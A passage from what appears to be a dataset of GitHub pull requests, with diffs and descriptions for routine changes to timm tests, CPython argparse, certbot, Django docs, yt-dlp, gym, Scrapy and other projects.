# test classifier + global pool deletion via __init__
model = create_model(model_name, pretrained=False, num_classes=0, global_pool='').eval()
+ model.to(torch_device)
outputs = model.forward(input_tensor)
assert len(outputs.shape) == 4
if not isinstance(model, (timm.models.MobileNetV3, timm.models.GhostNet, timm.models.RepGhostNet, timm.models.VGG)):
@@ -218,13 +237,14 @@ def test_model_default_cfgs(model_name, batch_size):
@pytest.mark.cfg
-@pytest.mark.timeout(300)
+@pytest.mark.timeout(timeout300)
@pytest.mark.parametrize('model_name', list_models(filter=NON_STD_FILTERS, exclude_filters=NON_STD_EXCLUDE_FILTERS, include_tags=True))
@pytest.mark.parametrize('batch_size', [1])
def test_model_default_cfgs_non_std(model_name, batch_size):
"""Run a single forward pass with each model"""
model = create_model(model_name, pretrained=False)
model.eval()
+ model.to(torch_device)
state_dict = model.state_dict()
cfg = model.default_cfg
@@ -232,7 +252,7 @@ def test_model_default_cfgs_non_std(model_name, batch_size):
if max(input_size) > 320: # FIXME const
pytest.skip("Fixed input size model > limit.")
- input_tensor = torch.randn((batch_size, *input_size))
+ input_tensor = torch.randn((batch_size, *input_size), device=torch_device)
feat_dim = getattr(model, 'feature_dim', None)
outputs = model.forward_features(input_tensor)
@@ -246,6 +266,7 @@ def test_model_default_cfgs_non_std(model_name, batch_size):
# test forward after deleting the classifier, output should be poooled, size(-1) == model.num_features
model.reset_classifier(0)
+ model.to(torch_device)
outputs = model.forward(input_tensor)
if isinstance(outputs, (tuple, list)):
outputs = outputs[0]
@@ -254,6 +275,7 @@ def test_model_default_cfgs_non_std(model_name, batch_size):
assert outputs.shape[feat_dim] == model.num_features, 'pooled num_features != config'
model = create_model(model_name, pretrained=False, num_classes=0).eval()
+ model.to(torch_device)
outputs = model.forward(input_tensor)
if isinstance(outputs, (tuple, list)):
outputs = outputs[0]
@@ -297,7 +319,7 @@ def test_model_features_pretrained(model_name, batch_size):
@pytest.mark.torchscript
-@pytest.mark.timeout(120)
+@pytest.mark.timeout(timeout120)
@pytest.mark.parametrize(
'model_name', list_models(exclude_filters=EXCLUDE_FILTERS + EXCLUDE_JIT_FILTERS, name_matches_cfg=True))
@pytest.mark.parametrize('batch_size', [1])
@@ -312,6 +334,7 @@ def test_model_forward_torchscript(model_name, batch_size):
model.eval()
model = torch.jit.script(model)
+ model.to(torch_device)
outputs = model(torch.randn((batch_size, *input_size)))
assert outputs.shape[0] == batch_size
diff --git a/tests/test_optim.py b/tests/test_optim.py
index 9bdfd6825d..38f625fb42 100644
--- a/tests/test_optim.py
+++ b/tests/test_optim.py
@@ -15,6 +15,13 @@
from timm.optim import create_optimizer_v2
+import importlib
+import os
+
+torch_backend = os.environ.get('TORCH_BACKEND')
+if torch_backend is not None:
+ importlib.import_module(torch_backend)
+torch_device = os.environ.get('TORCH_DEVICE', 'cuda')
# HACK relying on internal PyTorch test functionality for comparisons that I don't want to write
torch_tc = TestCase()
@@ -61,7 +68,7 @@ def _test_state_dict(weight, bias, input, constructor):
def fn_base(optimizer, weight, bias):
optimizer.zero_grad()
- i = input_cuda if weight.is_cuda else input
+ i = input_device if weight.device.type != 'cpu' else input
loss = (weight.mv(i) + bias).pow(2).sum()
loss.backward()
return loss
@@ -97,28 +104,30 @@ def fn_base(optimizer, weight, bias):
# Check that state dict can be loaded even when we cast parameters
# to a different type and move to a different device.
- if not torch.cuda.is_available():
+ if torch_device == 'cpu':
+ return
+ elif torch_device == 'cuda' and not torch.cuda.is_available():
return
with torch.no_grad():
- input_cuda = Parameter(input.clone().detach().float().cuda())
- weight_cuda = Parameter(weight.clone().detach().cuda())
- bias_cuda = Parameter(bias.clone().detach().cuda())
- optimizer_cuda = constructor(weight_cuda, bias_cuda)
- fn_cuda = functools.partial(fn_base, optimizer_cuda, weight_cuda, bias_cuda)
+ input_device = Parameter(input.clone().detach().float().to(torch_device))
+ weight_device = Parameter(weight.clone().detach().to(torch_device))
+ bias_device = Parameter(bias.clone().detach().to(torch_device))
+ optimizer_device = constructor(weight_device, bias_device)
+ fn_device = functools.partial(fn_base, optimizer_device, weight_device, bias_device)
state_dict = deepcopy(optimizer.state_dict())
state_dict_c = deepcopy(optimizer.state_dict())
- optimizer_cuda.load_state_dict(state_dict_c)
+ optimizer_device.load_state_dict(state_dict_c)
# Make sure state dict wasn't modified
torch_tc.assertEqual(state_dict, state_dict_c)
for _i in range(20):
optimizer.step(fn)
- optimizer_cuda.step(fn_cuda)
- torch_tc.assertEqual(weight, weight_cuda)
- torch_tc.assertEqual(bias, bias_cuda)
+ optimizer_device.step(fn_device)
+ torch_tc.assertEqual(weight, weight_device)
+ torch_tc.assertEqual(bias, bias_device)
# validate deepcopy() copies all public attributes
def getPublicAttr(obj):
@@ -152,12 +161,15 @@ def _test_basic_cases(constructor, scheduler_constructors=None):
scheduler_constructors
)
# CUDA
- if not torch.cuda.is_available():
+ if torch_device == 'cpu':
return
+ elif torch_device == 'cuda' and not torch.cuda.is_available():
+ return
+
_test_basic_cases_template(
- torch.randn(10, 5).cuda(),
- torch.randn(10).cuda(),
- torch.randn(5).cuda(),
+ torch.randn(10, 5).to(torch_device),
+ torch.randn(10).to(torch_device),
+ torch.randn(5).to(torch_device),
constructor,
scheduler_constructors
)
| This PR changes the test suite to allow running the tests on any hardware.
To do this I tried to make the test suite device-agnostic and allow setting the device and backend through environment variables. This is hopefully a future-proof way of allowing the test suite to run on any hardware.
I've also added the ability to change timeouts on tests that run on hardware.
Throughout these changes I've tried to keep the previous behaviour intact when the CI is used in the "normal" way: if the environment variables are not set, the previous values are used as defaults.
Example usage:
`TORCH_DEVICE=fancy_new_hw TORCH_BACKEND=new_torch_backend pytest tests/`
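Inside each test module this is honoured with the following pattern (condensed from the diff):

```python
import importlib
import os

# Optionally import a backend package named in TORCH_BACKEND, then read the
# target device from the environment, defaulting to 'cpu'.
torch_backend = os.environ.get('TORCH_BACKEND')
if torch_backend is not None:
    importlib.import_module(torch_backend)
torch_device = os.environ.get('TORCH_DEVICE', 'cpu')
```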
| https://api.github.com/repos/huggingface/pytorch-image-models/pulls/1993 | 2023-10-18T15:56:45Z | 2023-11-17T04:27:59Z | 2023-11-17T04:27:59Z | 2023-11-17T04:28:31Z | 2,790 | huggingface/pytorch-image-models | 16,441 |
gh-85308: argparse: Use filesystem encoding for arguments file | diff --git a/Doc/library/argparse.rst b/Doc/library/argparse.rst
index 0e62e99d706d4c..b2fa0b3c23c3a1 100644
--- a/Doc/library/argparse.rst
+++ b/Doc/library/argparse.rst
@@ -562,7 +562,7 @@ at the command line. If the ``fromfile_prefix_chars=`` argument is given to the
specified characters will be treated as files, and will be replaced by the
arguments they contain. For example::
- >>> with open('args.txt', 'w') as fp:
+ >>> with open('args.txt', 'w', encoding=sys.getfilesystemencoding()) as fp:
... fp.write('-f\nbar')
>>> parser = argparse.ArgumentParser(fromfile_prefix_chars='@')
>>> parser.add_argument('-f')
@@ -575,9 +575,18 @@ were in the same place as the original file referencing argument on the command
line. So in the example above, the expression ``['-f', 'foo', '@args.txt']``
is considered equivalent to the expression ``['-f', 'foo', '-f', 'bar']``.
+:class:`ArgumentParser` uses :term:`filesystem encoding and error handler`
+to read the file containing arguments.
+
The ``fromfile_prefix_chars=`` argument defaults to ``None``, meaning that
arguments will never be treated as file references.
+.. versionchanged:: 3.12
+ :class:`ArgumentParser` changed encoding and errors to read arguments files
+ from default (e.g. :func:`locale.getpreferredencoding(False)` and
+ ``"strict"``) to :term:`filesystem encoding and error handler`.
+ Arguments file should be encoded in UTF-8 instead of ANSI Codepage on Windows.
+
argument_default
^^^^^^^^^^^^^^^^
diff --git a/Doc/whatsnew/3.12.rst b/Doc/whatsnew/3.12.rst
index 033de1780b3d18..88013117564965 100644
--- a/Doc/whatsnew/3.12.rst
+++ b/Doc/whatsnew/3.12.rst
@@ -140,6 +140,12 @@ Changes in the Python API
select from a larger range than ``randrange(10**25)``.
(Originally suggested by Serhiy Storchaka gh-86388.)
+* :class:`argparse.ArgumentParser` changed encoding and error handler
+ for reading arguments from file (e.g. ``fromfile_prefix_chars`` option)
+ from default text encoding (e.g. :func:`locale.getpreferredencoding(False) <locale.getpreferredencoding>`)
+ to :term:`filesystem encoding and error handler`.
+ Argument files should be encoded in UTF-8 instead of ANSI Codepage on Windows.
+
Build Changes
=============
diff --git a/Lib/argparse.py b/Lib/argparse.py
index 1c5520c4b41bd1..02e98bbf920cf1 100644
--- a/Lib/argparse.py
+++ b/Lib/argparse.py
@@ -2161,7 +2161,9 @@ def _read_args_from_files(self, arg_strings):
# replace arguments referencing files with the file content
else:
try:
- with open(arg_string[1:]) as args_file:
+ with open(arg_string[1:],
+ encoding=_sys.getfilesystemencoding(),
+ errors=_sys.getfilesystemencodeerrors()) as args_file:
arg_strings = []
for arg_line in args_file.read().splitlines():
for arg in self.convert_arg_line_to_args(arg_line):
diff --git a/Misc/NEWS.d/next/Library/2022-05-27-10-52-06.gh-issue-85308.K6r-tJ.rst b/Misc/NEWS.d/next/Library/2022-05-27-10-52-06.gh-issue-85308.K6r-tJ.rst
new file mode 100644
index 00000000000000..4574264dd4d433
--- /dev/null
+++ b/Misc/NEWS.d/next/Library/2022-05-27-10-52-06.gh-issue-85308.K6r-tJ.rst
@@ -0,0 +1,4 @@
+Changed :class:`argparse.ArgumentParser` to use :term:`filesystem encoding
+and error handler` instead of default text encoding to read arguments from
+file (e.g. ``fromfile_prefix_chars`` option). This change affects Windows;
+argument file should be encoded with UTF-8 instead of ANSI Codepage.
| Fixes #85308 | https://api.github.com/repos/python/cpython/pulls/93277 | 2022-05-27T02:34:42Z | 2022-06-23T03:09:57Z | 2022-06-23T03:09:57Z | 2022-06-23T08:18:03Z | 1,036 | python/cpython | 3,944 |
Update docs link in certbot unsupported error | diff --git a/letsencrypt-auto-source/letsencrypt-auto b/letsencrypt-auto-source/letsencrypt-auto
index 32eab52cdaa..56d9c65cf2a 100755
--- a/letsencrypt-auto-source/letsencrypt-auto
+++ b/letsencrypt-auto-source/letsencrypt-auto
@@ -930,7 +930,7 @@ else
error "Sorry, I don't know how to bootstrap Certbot on your operating system!"
error
error "You will need to install OS dependencies, configure virtualenv, and run pip install manually."
- error "Please see https://letsencrypt.readthedocs.org/en/latest/contributing.html#prerequisites"
+ error "Please see https://certbot.eff.org/docs/contributing.html#prerequisites"
error "for more info."
exit 1
}
diff --git a/letsencrypt-auto-source/letsencrypt-auto.template b/letsencrypt-auto-source/letsencrypt-auto.template
index da8fabfeaf0..acdfcdb41cc 100755
--- a/letsencrypt-auto-source/letsencrypt-auto.template
+++ b/letsencrypt-auto-source/letsencrypt-auto.template
@@ -452,7 +452,7 @@ else
error "Sorry, I don't know how to bootstrap Certbot on your operating system!"
error
error "You will need to install OS dependencies, configure virtualenv, and run pip install manually."
- error "Please see https://letsencrypt.readthedocs.org/en/latest/contributing.html#prerequisites"
+ error "Please see https://certbot.eff.org/docs/contributing.html#prerequisites"
error "for more info."
exit 1
}
| ## Pull Request Checklist
- [ ] If the change being made is to a [distributed component](https://certbot.eff.org/docs/contributing.html#code-components-and-layout), edit the `master` section of `certbot/CHANGELOG.md` to include a description of the change being made.
- [ ] Include your name in `AUTHORS.md` if you like.
Minor change, but it's been mentioned more than once, so I'm sending a PR. | https://api.github.com/repos/certbot/certbot/pulls/8168 | 2020-07-23T11:12:39Z | 2020-08-20T18:33:57Z | 2020-08-20T18:33:57Z | 2020-08-20T18:33:57Z | 370 | certbot/certbot | 2,318 |
Add Deezer to music APIs | diff --git a/README.md b/README.md
index b1224e0486..a92ea8748b 100644
--- a/README.md
+++ b/README.md
@@ -217,6 +217,7 @@ A collective list of JSON APIs for use in web development.
| Songsterr | Provides guitar, bass and drums tabs and chords | No | [Go!](https://www.songsterr.com/a/wa/api/) |
| Soundcloud | Music | No | [Go!](https://developers.soundcloud.com/) |
| Spotify | Music | Parts | [Go!](https://developer.spotify.com/web-api/) |
+| Deezer | Music | Yes | [Go!](http://developers.deezer.com/api) |
### Open Source projects
| https://api.github.com/repos/public-apis/public-apis/pulls/224 | 2016-10-04T22:17:18Z | 2016-10-06T07:55:37Z | 2016-10-06T07:55:37Z | 2016-10-06T07:55:40Z | 169 | public-apis/public-apis | 35,219 |
|
Fixed #31029 -- Used more specific links to RFCs. | diff --git a/docs/internals/contributing/writing-documentation.txt b/docs/internals/contributing/writing-documentation.txt
index 577a611d8dff8..299106345ee54 100644
--- a/docs/internals/contributing/writing-documentation.txt
+++ b/docs/internals/contributing/writing-documentation.txt
@@ -235,6 +235,10 @@ documentation:
Five
^^^^
+* Use :rst:role:`:rfc:<rfc>` to reference RFC and and try to link to the
+ relevant section if possible. For example, use ``:rfc:`2324#section-2.3.2```
+ or ``:rfc:`Custom link text <2324#section-2.3.2>```.
+
Django-specific markup
======================
diff --git a/docs/ref/csrf.txt b/docs/ref/csrf.txt
index e2f9d30703787..ee6d0643fefd6 100644
--- a/docs/ref/csrf.txt
+++ b/docs/ref/csrf.txt
@@ -298,10 +298,11 @@ This ensures that only forms that have originated from trusted domains can be
used to POST data back.
It deliberately ignores GET requests (and other requests that are defined as
-'safe' by :rfc:`7231`). These requests ought never to have any potentially
-dangerous side effects , and so a CSRF attack with a GET request ought to be
-harmless. :rfc:`7231` defines POST, PUT, and DELETE as 'unsafe', and all other
-methods are also assumed to be unsafe, for maximum protection.
+'safe' by :rfc:`7231#section-4.2.1`). These requests ought never to have any
+potentially dangerous side effects, and so a CSRF attack with a GET request
+ought to be harmless. :rfc:`7231#section-4.2.1` defines POST, PUT, and DELETE
+as 'unsafe', and all other methods are also assumed to be unsafe, for maximum
+protection.
The CSRF protection cannot protect against man-in-the-middle attacks, so use
:ref:`HTTPS <security-recommendation-ssl>` with
diff --git a/docs/ref/models/instances.txt b/docs/ref/models/instances.txt
index 5f8f389506e8d..9345bc0fe0bd6 100644
--- a/docs/ref/models/instances.txt
+++ b/docs/ref/models/instances.txt
@@ -755,8 +755,8 @@ track down every place that the URL might be created. Specify it once, in
.. note::
The string you return from ``get_absolute_url()`` **must** contain only
- ASCII characters (required by the URI specification, :rfc:`2396`) and be
- URL-encoded, if necessary.
+ ASCII characters (required by the URI specification, :rfc:`2396#section-2`)
+ and be URL-encoded, if necessary.
Code and templates calling ``get_absolute_url()`` should be able to use the
result directly without any further processing. You may wish to use the
diff --git a/docs/ref/request-response.txt b/docs/ref/request-response.txt
index a7e73ba1f518f..44d59b5f9a5d5 100644
--- a/docs/ref/request-response.txt
+++ b/docs/ref/request-response.txt
@@ -823,9 +823,9 @@ Methods
JavaScript from having access to the cookie.
HttpOnly_ is a flag included in a Set-Cookie HTTP response header. It's
- part of the :rfc:`6265` standard for cookies and can be a useful way to
- mitigate the risk of a client-side script accessing the protected cookie
- data.
+ part of the :rfc:`RFC 6265 <6265#section-4.1.2.6>` standard for cookies
+ and can be a useful way to mitigate the risk of a client-side script
+ accessing the protected cookie data.
* Use ``samesite='Strict'`` or ``samesite='Lax'`` to tell the browser not
to send this cookie when performing a cross-origin request. `SameSite`_
isn't supported by all browsers, so it's not a replacement for Django's
@@ -836,11 +836,11 @@ Methods
.. warning::
- :rfc:`6265` states that user agents should support cookies of at least
- 4096 bytes. For many browsers this is also the maximum size. Django
- will not raise an exception if there's an attempt to store a cookie of
- more than 4096 bytes, but many browsers will not set the cookie
- correctly.
+ :rfc:`RFC 6265 <6265#section-6.1>` states that user agents should
+ support cookies of at least 4096 bytes. For many browsers this is also
+ the maximum size. Django will not raise an exception if there's an
+ attempt to store a cookie of more than 4096 bytes, but many browsers
+ will not set the cookie correctly.
.. method:: HttpResponse.set_signed_cookie(key, value, salt='', max_age=None, expires=None, path='/', domain=None, secure=None, httponly=False, samesite=None)
diff --git a/docs/ref/settings.txt b/docs/ref/settings.txt
index d493b76aa0f55..e04d2118857e3 100644
--- a/docs/ref/settings.txt
+++ b/docs/ref/settings.txt
@@ -2759,7 +2759,7 @@ preference to the ``Host`` header. This should only be enabled if a proxy
which sets this header is in use.
This setting takes priority over :setting:`USE_X_FORWARDED_PORT`. Per
-:rfc:`7239#page-7`, the ``X-Forwarded-Host`` header can include the port
+:rfc:`7239#section-5.3`, the ``X-Forwarded-Host`` header can include the port
number, in which case you shouldn't use :setting:`USE_X_FORWARDED_PORT`.
.. setting:: USE_X_FORWARDED_PORT
@@ -3108,8 +3108,8 @@ Whether to use ``HttpOnly`` flag on the session cookie. If this is set to
cookie.
HttpOnly_ is a flag included in a Set-Cookie HTTP response header. It's part of
-the :rfc:`6265` standard for cookies and can be a useful way to mitigate the
-risk of a client-side script accessing the protected cookie data.
+the :rfc:`6265#section-4.1.2.6` standard for cookies and can be a useful way to
+mitigate the risk of a client-side script accessing the protected cookie data.
This makes it less trivial for an attacker to escalate a cross-site scripting
vulnerability into full hijacking of a user's session. There aren't many good
diff --git a/docs/ref/templates/builtins.txt b/docs/ref/templates/builtins.txt
index ea6ae5aeebf13..cc572583ee46a 100644
--- a/docs/ref/templates/builtins.txt
+++ b/docs/ref/templates/builtins.txt
@@ -1417,7 +1417,8 @@ Format character Description Example output
the "c" formatter will not add timezone
offset if value is a naive datetime
(see :class:`datetime.tzinfo`).
-``r`` :rfc:`5322` formatted date. ``'Thu, 21 Dec 2000 16:01:07 +0200'``
+``r`` :rfc:`RFC 5322 <5322#section-3.3>` ``'Thu, 21 Dec 2000 16:01:07 +0200'``
+ formatted date.
``U`` Seconds since the Unix Epoch
(January 1 1970 00:00:00 UTC).
================ ======================================== =====================
diff --git a/docs/ref/utils.txt b/docs/ref/utils.txt
index 33afbac36ae16..d8af302c0e40e 100644
--- a/docs/ref/utils.txt
+++ b/docs/ref/utils.txt
@@ -713,8 +713,8 @@ escaping HTML.
.. function:: http_date(epoch_seconds=None)
- Formats the time to match the :rfc:`1123` date format as specified by HTTP
- :rfc:`7231#section-7.1.1.1`.
+ Formats the time to match the :rfc:`1123#section-5.2.14` date format as
+ specified by HTTP :rfc:`7231#section-7.1.1.1`.
Accepts a floating point number expressed in seconds since the epoch in
UTC--such as that outputted by ``time.time()``. If set to ``None``,
diff --git a/docs/ref/validators.txt b/docs/ref/validators.txt
index 4fd2a37cbc161..7b7a184b1aa39 100644
--- a/docs/ref/validators.txt
+++ b/docs/ref/validators.txt
@@ -154,7 +154,8 @@ to, or in lieu of custom ``field.clean()`` methods.
an error code of ``'invalid'`` if it doesn't.
Loopback addresses and reserved IP spaces are considered valid. Literal
- IPv6 addresses (:rfc:`2732`) and unicode domains are both supported.
+ IPv6 addresses (:rfc:`3986#section-3.2.2`) and unicode domains are both
+ supported.
In addition to the optional arguments of its parent :class:`RegexValidator`
class, ``URLValidator`` accepts an extra optional attribute:
| ticket-31029 | https://api.github.com/repos/django/django/pulls/12142 | 2019-11-25T08:43:43Z | 2019-11-28T06:59:36Z | 2019-11-28T06:59:36Z | 2019-11-30T06:31:32Z | 2,154 | django/django | 51,395 |
update profiler docs again | diff --git a/selfdrive/debug/profiling/snapdragon/README.md b/selfdrive/debug/profiling/snapdragon/README.md
index 0bf6cd99e600dd..664814b6115273 100644
--- a/selfdrive/debug/profiling/snapdragon/README.md
+++ b/selfdrive/debug/profiling/snapdragon/README.md
@@ -3,11 +3,11 @@ snapdragon profiler
* download from https://developer.qualcomm.com/software/snapdragon-profiler/tools-archive (need a qc developer account)
- * choose v2021.5 (verified working with 20.04)
+ * choose v2021.5 (verified working with 20.04 dev environment)
* unzip to selfdrive/debug/profiling/snapdragon/SnapdragonProfiler
* run ```./setup-profiler.sh```
* run ```./setup-agnos.sh```
* run ```selfdrive/debug/adb.sh``` on device
-* run the ```adb connect xxx``` command that was given to you on local pc (if you changed adb path in previous step, run that version of adb)
+* run the ```adb connect xxx``` command that was given to you on local pc
* cd to SnapdragonProfiler and run ```./run_sdp.sh```
-* connect to device -> choose device you just setup
\ No newline at end of file
+* connect to device -> choose device you just setup
| https://api.github.com/repos/commaai/openpilot/pulls/30503 | 2023-11-20T21:27:48Z | 2023-11-20T21:30:17Z | 2023-11-20T21:30:17Z | 2023-11-20T21:30:18Z | 308 | commaai/openpilot | 8,928 |
|
Added xnxx.com's alternative domain support. | diff --git a/yt_dlp/extractor/xnxx.py b/yt_dlp/extractor/xnxx.py
index dd4fb54d463..27f99162778 100644
--- a/yt_dlp/extractor/xnxx.py
+++ b/yt_dlp/extractor/xnxx.py
@@ -13,7 +13,7 @@
class XNXXIE(InfoExtractor):
- _VALID_URL = r'https?://(?:video|www)\.xnxx\.com/video-?(?P<id>[0-9a-z]+)/'
+ _VALID_URL = r'https?://(?:video|www)\.xnxx3?\.com/video-?(?P<id>[0-9a-z]+)/'
_TESTS = [{
'url': 'http://www.xnxx.com/video-55awb78/skyrim_test_video',
'md5': '7583e96c15c0f21e9da3453d9920fbba',
@@ -32,6 +32,9 @@ class XNXXIE(InfoExtractor):
}, {
'url': 'http://www.xnxx.com/video-55awb78/',
'only_matching': True,
+ }, {
+ 'url': 'http://www.xnxx3.com/video-55awb78/',
+ 'only_matching': True,
}]
def _real_extract(self, url):
| ### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [x] Improvement
- [ ] New extractor
- [ ] New feature
---
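For reference, a quick check of the updated `_VALID_URL` pattern against both domains (illustrative only):

```python
import re

_VALID_URL = r'https?://(?:video|www)\.xnxx3?\.com/video-?(?P<id>[0-9a-z]+)/'

for url in ('http://www.xnxx.com/video-55awb78/',
            'http://www.xnxx3.com/video-55awb78/'):
    m = re.match(_VALID_URL, url)
    assert m and m.group('id') == '55awb78'  # both domains now match
```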
| https://api.github.com/repos/yt-dlp/yt-dlp/pulls/3188 | 2022-03-25T08:23:48Z | 2022-03-30T10:54:35Z | 2022-03-30T10:54:35Z | 2022-03-30T14:31:24Z | 316 | yt-dlp/yt-dlp | 7,413 |
Update together.ipynb | diff --git a/docs/examples/embeddings/together.ipynb b/docs/examples/embeddings/together.ipynb
index b468d5f4bacf1..210e79cea0187 100644
--- a/docs/examples/embeddings/together.ipynb
+++ b/docs/examples/embeddings/together.ipynb
@@ -11,9 +11,9 @@
"cell_type": "markdown",
"metadata": {},
"source": [
- "# Together.ai Embeddings -- \"m2-bert-80M-8k-retrieval\"\n",
+ "# Together AI Embeddings\n",
"\n",
- "This notebook shows how to user `Together.ai` for embeddings. Together.ai provides access to many state-of-the-art embedding models.\n",
+ "This notebook shows how to use `Together AI` for embeddings. Together AI provides access to many state-of-the-art embedding models.\n",
"\n",
"Visit https://together.ai and sign up to get an API key."
]
| # Description
Requesting to update the title and the company name.
Fixes # (issue)
## Type of Change
- [ ] This change requires a documentation update
| https://api.github.com/repos/run-llama/llama_index/pulls/9975 | 2024-01-11T01:14:27Z | 2024-01-11T01:38:30Z | 2024-01-11T01:38:30Z | 2024-01-11T01:38:30Z | 221 | run-llama/llama_index | 6,660 |
gym.spaces.Dict inherits from collections.abc.Mapping | diff --git a/gym/spaces/dict.py b/gym/spaces/dict.py
index b7b7389573b..01cb7141842 100644
--- a/gym/spaces/dict.py
+++ b/gym/spaces/dict.py
@@ -1,9 +1,10 @@
from collections import OrderedDict
+from collections.abc import Mapping
import numpy as np
from .space import Space
-class Dict(Space):
+class Dict(Space, Mapping):
"""
A dictionary of simpler spaces.
@@ -116,9 +117,6 @@ def __iter__(self):
def __len__(self):
return len(self.spaces)
- def __contains__(self, item):
- return self.contains(item)
-
def __repr__(self):
return (
"Dict("
@@ -144,15 +142,3 @@ def from_jsonable(self, sample_n):
entry[key] = value[i]
ret.append(entry)
return ret
-
- def __eq__(self, other):
- return isinstance(other, Dict) and self.spaces == other.spaces
-
- def keys(self):
- return self.spaces.keys()
-
- def values(self):
- return self.spaces.values()
-
- def items(self):
- return self.spaces.items()
| It would be very convenient to have `gym.spaces.Dict` inherit from `collections.abc.Mapping` so that it can be used in conjunction with [dmtree](https://github.com/deepmind/tree) to perform operations on complex spaces. It also simplifies the implementation, which is a bonus.
I just don't like that the `__contains__` method's behavior is not consistent with what it would be for a proper mapping, but I don't think it is an issue.
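A minimal sketch of the kind of usage this enables, assuming the `dm-tree` package is installed (illustrative, not part of the patch):

```python
from collections.abc import Mapping

import tree  # dm-tree
from gym import spaces

space = spaces.Dict({
    "position": spaces.Box(low=-1.0, high=1.0, shape=(3,)),
    "velocity": spaces.Box(low=-1.0, high=1.0, shape=(2,)),
})

assert isinstance(space, Mapping)  # new with this change

# Mapping provides dict-style iteration, so dm-tree can consume the space:
shapes = tree.map_structure(lambda s: s.shape, dict(space))
print(shapes)  # {'position': (3,), 'velocity': (2,)}
```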
Note that this patch is NOT removing any existing feature, so it should not break compatibility. | https://api.github.com/repos/openai/gym/pulls/2446 | 2021-10-14T10:21:23Z | 2021-10-17T01:22:30Z | 2021-10-17T01:22:30Z | 2021-10-26T00:48:06Z | 289 | openai/gym | 5,071 |
[MRG] DOC simplify extension docs | diff --git a/docs/topics/downloader-middleware.rst b/docs/topics/downloader-middleware.rst
index 614e4fff6d3..bff0d3e1c64 100644
--- a/docs/topics/downloader-middleware.rst
+++ b/docs/topics/downloader-middleware.rst
@@ -51,8 +51,8 @@ particular setting. See each middleware documentation for more info.
Writing your own downloader middleware
======================================
-Writing your own downloader middleware is easy. Each middleware component is a
-single Python class that defines one or more of the following methods:
+Each middleware component is a Python class that defines one or
+more of the following methods:
.. module:: scrapy.contrib.downloadermiddleware
diff --git a/docs/topics/extensions.rst b/docs/topics/extensions.rst
index 593a08ddc0b..c23e783bf12 100644
--- a/docs/topics/extensions.rst
+++ b/docs/topics/extensions.rst
@@ -5,7 +5,7 @@ Extensions
==========
The extensions framework provides a mechanism for inserting your own
-custom functionality into Scrapy.
+custom functionality into Scrapy.
Extensions are just regular classes that are instantiated at Scrapy startup,
when extensions are initialized.
@@ -75,14 +75,10 @@ included in the :setting:`EXTENSIONS_BASE` setting) you must set its order to
Writing your own extension
==========================
-Writing your own extension is easy. Each extension is a single Python class
-which doesn't need to implement any particular method.
-
-The main entry point for a Scrapy extension (this also includes middlewares and
-pipelines) is the ``from_crawler`` class method which receives a
-``Crawler`` instance which is the main object controlling the Scrapy crawler.
-Through that object you can access settings, signals, stats, and also control
-the crawler behaviour, if your extension needs to such thing.
+Each extension is a Python class. The main entry point for a Scrapy extension
+(this also includes middlewares and pipelines) is the ``from_crawler``
+class method which receives a ``Crawler`` instance. Through the Crawler object
+you can access settings, signals, stats, and also control the crawling behaviour.
Typically, extensions connect to :ref:`signals <topics-signals>` and perform
tasks triggered by them.
@@ -133,7 +129,7 @@ Here is the code of such extension::
crawler.signals.connect(ext.spider_closed, signal=signals.spider_closed)
crawler.signals.connect(ext.item_scraped, signal=signals.item_scraped)
- # return the extension object
+ # return the extension object
return ext
def spider_opened(self, spider):
@@ -183,12 +179,12 @@ Telnet console extension
~~~~~~~~~~~~~~~~~~~~~~~~
.. module:: scrapy.telnet
- :synopsis: Telnet console
+ :synopsis: Telnet console
.. class:: scrapy.telnet.TelnetConsole
Provides a telnet console for getting into a Python interpreter inside the
-currently running Scrapy process, which can be very useful for debugging.
+currently running Scrapy process, which can be very useful for debugging.
The telnet console must be enabled by the :setting:`TELNETCONSOLE_ENABLED`
setting, and the server will listen in the port specified in
diff --git a/docs/topics/item-pipeline.rst b/docs/topics/item-pipeline.rst
index 146f6cbcee1..9cd1989993d 100644
--- a/docs/topics/item-pipeline.rst
+++ b/docs/topics/item-pipeline.rst
@@ -23,8 +23,7 @@ Typical use for item pipelines are:
Writing your own item pipeline
==============================
-Writing your own item pipeline is easy. Each item pipeline component is a
-single Python class that must implement the following method:
+Each item pipeline component is a Python class that must implement the following method:
.. method:: process_item(item, spider)
diff --git a/docs/topics/spider-middleware.rst b/docs/topics/spider-middleware.rst
index 3df59998b91..92dc6ac4736 100644
--- a/docs/topics/spider-middleware.rst
+++ b/docs/topics/spider-middleware.rst
@@ -52,8 +52,8 @@ particular setting. See each middleware documentation for more info.
Writing your own spider middleware
==================================
-Writing your own spider middleware is easy. Each middleware component is a
-single Python class that defines one or more of the following methods:
+Each middleware component is a Python class that defines one or more of the
+following methods:
.. module:: scrapy.contrib.spidermiddleware
| In this PR I tried to remove some noise from the extension docs.
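For context, this is the minimal extension shape the revised page documents — a plain class whose `from_crawler` entry point wires up signal handlers (condensed from the docs' own example):

```python
from scrapy import signals

class SpiderOpenCloseLogging:

    @classmethod
    def from_crawler(cls, crawler):
        ext = cls()
        # through the crawler you can reach settings, signals and stats
        crawler.signals.connect(ext.spider_opened, signal=signals.spider_opened)
        crawler.signals.connect(ext.spider_closed, signal=signals.spider_closed)
        return ext

    def spider_opened(self, spider):
        spider.log("opened spider %s" % spider.name)

    def spider_closed(self, spider):
        spider.log("closed spider %s" % spider.name)
```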
| https://api.github.com/repos/scrapy/scrapy/pulls/893 | 2014-09-20T18:20:56Z | 2014-10-21T19:13:59Z | 2014-10-21T19:13:59Z | 2014-10-21T19:13:59Z | 1,010 | scrapy/scrapy | 34,969 |
acme: use order "status" to determine action during finalization | diff --git a/acme/acme/client.py b/acme/acme/client.py
index b5021b44726..aa7085fb0c0 100644
